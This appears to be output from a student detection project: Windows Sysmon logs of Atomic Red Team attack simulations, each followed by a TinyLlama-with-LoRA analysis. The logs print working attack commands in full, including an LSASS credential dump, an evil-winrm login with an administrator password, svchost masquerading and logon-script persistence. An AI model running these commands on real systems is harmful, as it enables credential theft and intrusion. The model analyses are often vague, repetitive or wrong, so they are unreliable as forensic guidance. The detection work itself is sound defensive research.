/Documents/MTECH/Sem IV/SecureSLM/PreProcessing/inference_tinyllama.py"

📝 Log 1: 1. On 7/10/2025 1:03:32 PM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 2716) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 9688.0) with command: "powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll  MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full}. The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 1:03:32 PM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 9688) was launched using the command: "powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll  MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that malicious actors are using PowerShell to execute MiniDump and comsvcs.dll with lsass.exe to dump the lsass process and its memory. The process is executed from a temporary directory, indicating potential data exfiltration. Relevant security measures should be implemented to prevent such activities.

📝 Log 2: On 7/10/2025 1:04:56 PM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 9248) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 10252.0) with command: "powershell.exe" & {evil-winrm -i Target -u Domain\Administrator -p P@ssw0rd1}. The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

On 7/10/2025 1:04:56 PM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 10252) was launched using the command: "powershell.exe" & {evil-winrm -i Target -u Domain\Administrator -p P@ssw0rd1}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The attacker is using PowerShell to execute remote commands using the evil-winrm tool. The process is running under the user account with high integrity level. The logs indicate the execution of PowerShell with privileged credentials and PowerShell with non-privileged credentials. The logs require investigation to identify the attacker's motivations and potential vulnerabilities.

📝 Log 3: 1. On 7/10/2025 12:30:45 PM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 6816) was launched using the command: "powershell.exe" & {$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden'  'System'  'Archive'; Write-Host \""File created: $($file.FullName)\""}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 12:30:45 PM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 8940) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 6816.0) with command: "powershell.exe" & {$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden'  'System'  'Archive'; Write-Host \""File created: $($file.FullName)\""}. The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that the attacker is using PowerShell to create and manipulate registry files. The process `conhost.exe` is launched from the PowerShell command, indicating that it is being used for reconnaissance or lateral movement. The logs show that the attacker is using privileged processes and directories to execute PowerShell commands, indicating a high-level of privilege abuse. The logs also show that the attacker is using system processes and directories to create and manipulate files, indicating a high-level of system abuse. The logs require further investigation to identify the full scope of the attack and potential victims.

📝 Log 4: 1. On 7/10/2025 1:06:50 PM, Event ID 1 occurred. Process 'C:\Users\bazinga\AppData\Local\Temp\svchost.exe' (PID: 2108) was launched using the command: "C:\Users\bazinga\AppData\Local\Temp\svchost.exe". It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 5816.0) with command: "powershell.exe" & {copy \""$env:ComSpec\"" ($env:TEMP + \""\svchost.exe\"") $myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \""\svchost.exe\"")).Id Stop-Process -ID $myT1036_003}. The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 1:06:50 PM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 8428) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Users\bazinga\AppData\Local\Temp\svchost.exe' (PID: 2108.0) with command: "C:\Users\bazinga\AppData\Local\Temp\svchost.exe". The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that the attacker is using PowerShell to execute svchost.exe from a temporary directory, which is being run from the context of the svchost.exe process. The attacker is using the svchost.exe process to launch other processes, including conhost.exe, which is being executed with ForceV1. The process is being run from the context of the svchost.exe process, indicating that it is being executed from a privileged directory. These logs require further investigation to identify the exact nature of the attack and the potential consequences.

📝 Log 5: 1. On 7/10/2025 1:08:58 PM, Event ID 1 occurred. Process 'C:\Windows\System32\reg.exe' (PID: 2080) was launched using the command: REG.exe  ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\bazinga\AppData\Local\Temp\art.bat" /f. It was spawned by 'C:\Windows\System32\cmd.exe' (PID: 7756.0) with command: "cmd.exe" /c echo "echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt" > %temp%\art.bat & REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "%temp%\art.bat" /f. The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 1:08:57 PM, Event ID 1 occurred. Process 'C:\Windows\System32\cmd.exe' (PID: 7756) was launched using the command: "cmd.exe" /c echo "echo Art "Logon Script" atomic test was successful. >> %%USERPROFILE%%\desktop\T1037.001-log.txt" > %%temp%%\art.bat & REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "%%temp%%\art.bat" /f. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that the attacker executed PowerShell commands to execute a logon script and execute a batch file to perform atomic testing. The attacker used privileged processes to execute commands from non-standard directories and with high integrity levels. The logs suggest that the attacker is using PowerShell to execute privileged commands and is leveraging privileged processes to execute logon scripts and batch files. The logs require investigation to identify the full scope of the attack and potential mitigations.     

📝 Log 6: 1. On 7/10/2025 12:37:57 PM, Event ID 1 occurred. Process 'C:\Windows\System32\PktMon.exe' (PID: 6008) was launched using the command: pktmon.exe  stop. It was spawned by 'C:\Windows\System32\cmd.exe' (PID: 7980.0) with command: "cmd.exe" /c pktmon.exe start --etw  -f %TEMP%\t1040.etl & TIMEOUT /T 5 >nul 2>&1 & pktmon.exe stop. The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 12:37:52 PM, Event ID 1 occurred. Process 'C:\Windows\System32\cmd.exe' (PID: 7980) was launched using the command: "cmd.exe" /c pktmon.exe start --etw  -f %%TEMP%%\t1040.etl & TIMEOUT /T 5 >nul 2>&1 & pktmon.exe stop. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that malicious activity is being conducted through PowerShell and cmd.exe processes. These processes are being launched from temporary directories and are running with high integrity levels. The logs suggest the use of packet monitoring tools to gather system information and identify potential security vulnerabilities. Relevant security measures should be implemented to prevent further malicious activity.

📝 Log 7: 1. On 7/10/2025 12:26:08 PM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 8156) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 7376.0) with command: "powershell.exe" & {Send-MailMessage -From test@corp.com -To test@corp.com -Subject \""T1048.003 Atomic Test\"" -Attachments C:\Windows\System32\notepad.exe -SmtpServer 127.0.0.1}. The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 12:26:08 PM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 7376) was launched using the command: "powershell.exe" & {Send-MailMessage -From test@corp.com -To test@corp.com -Subject \""T1048.003 Atomic Test\"" -Attachments C:\Windows\System32\notepad.exe -SmtpServer 127.0.0.1}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that the attacker is using PowerShell to execute remote commands and send emails. The attacker is using privileged processes such as Windows PowerShell to execute commands and run remote tools. The logs suggest that the attacker is using privileged processes to execute remote commands and send emails. The logs indicate that the attacker is using PowerShell to execute remote commands and send emails. The logs suggest that the attacker is using privileged processes such as Windows PowerShell to execute commands and run remote tools.

📝 Log 8: 1. On 7/10/2025 12:28:21 PM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 2632) was launched using the command: "powershell.exe" & {$notepad = Start-Process notepad -passthru Start-Process \""C:\AtomicRedTeam\atomics\T1055.003\bin\InjectContext.exe\"" Start-Sleep -Seconds 5 Stop-Process $notepad.id}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 3704.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/10/2025 12:28:25 PM, Event ID 1 occurred. Process 'C:\Windows\System32\notepad.exe' (PID: 7748) was launched using the command: "C:\Windows\system32\notepad.exe". It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 2632.0) with command: "powershell.exe" & {$notepad = Start-Process notepad -passthru Start-Process \""C:\AtomicRedTeam\atomics\T1055.003\bin\InjectContext.exe\"" Start-Sleep -Seconds 5 Stop-Process $notepad.id}. The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that the attacker is using PowerShell to execute InjectContext.exe and injecting malicious code into the process. The attacker is using privileged processes and directories to execute these tools and execute system processes. The logs suggest that the attacker is using privileged processes and directories to execute tools and execute system processes.

📝 Log 9: 1. On 7/11/2025 11:53:59 AM, Event ID 1 occurred. Process 'C:\Windows\System32\conhost.exe' (PID: 5600) was launched using the command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 9740.0) with command: "powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll  MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full}. The process ran in directory 'C:\Windows' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.

2. On 7/11/2025 11:53:59 AM, Event ID 1 occurred. Process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 9740) was launched using the command: "powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll  MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full}. It was spawned by 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' (PID: 4564.0) with command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". The process ran in directory 'C:\Users\bazinga\AppData\Local\Temp\' under user 'DESKTOP-DU6JNPV\bazinga' with an integrity level of 'High'.
📊 TinyLLaMA + LoRA Analysis:
The logs indicate that malicious actors are using PowerShell to execute lsass.exe with MiniDump and full dumping to gain access to system processes and memory. The process is executed from a temporary directory and is run from an unusual directory, indicating potential data exfiltration. Relevant security measures should be implemented to prevent such activities.